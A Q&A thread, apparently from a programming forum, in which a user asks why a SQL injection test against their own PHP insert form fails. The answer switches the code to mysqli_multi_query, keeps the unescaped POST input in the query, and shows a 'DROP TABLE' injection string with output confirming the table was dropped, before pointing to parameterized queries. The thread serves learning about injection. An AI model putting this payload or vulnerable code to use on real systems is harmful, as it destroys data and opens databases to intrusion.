could you please tell me why my SQL-Injection isn't working and how can I fix it. I tried to go after the example from Here, but value'); DROP TABLE table;-- or password 1=1 doesn' work. Im sorry to steal your time with these easy things, but I tried it many times and I didn't get it running and the other post didn't help me.
<?php
$connection = mysqli_connect('localhost', 'root','' ,'DB') or die(mysqli_error());
mysqli_select_db($connection ,'DB')or die(mysqli_error());
@$unsafe_variable = $_POST['vorname'];
mysqli_query($connection, "INSERT INTO `Persons` (`Vorname`) VALUES ('$unsafe_variable')");
In order to test SQL Injection with your code we need to make some few changes:
<?php
$connection = mysqli_connect('localhost', 'root','' ,'DB') or
die(mysqli_error($connection)); //1
mysqli_select_db($connection ,'DB') or die(mysqli_error($connection)); //2
$unsafe_variable = $_POST['vorname'];
mysqli_multi_query($connection, //3
"INSERT INTO `Persons` (`Vorname`) VALUES ('$unsafe_variable')");
?>
mysqli_error
needs $connection parameter.mysqli_multi_query
is able to execute more than one sentence at a time. For security reasons. mysqli_query
just executes one to prevent sql injection.It's the time to test sql injection. We create a simple table t
to check if we can drop it through sql injection:
create table t ( i int );
Time to attack, the killer string to inject sql is:
pepe'); DROP TABLE t;--
SQL with injected code:
"INSERT INTO Persons (Vorname) VALUES ('pepe'); DROP TABLE t;--')"
"INSERT INTO Persons (Vorname) VALUES ('$unsafe_variable')"
$unsafe_variable
: "INSERT INTO Persons (Vorname) VALUES ('pepe'); DROP TABLE t;--')"
After post this value to form:
mysql> select * from t;
ERROR 1146 (42S02): Table 's.t' doesn't exist
Man, this is Internet, they are a lot of papers about it. Start your searching with Parameterized Queries.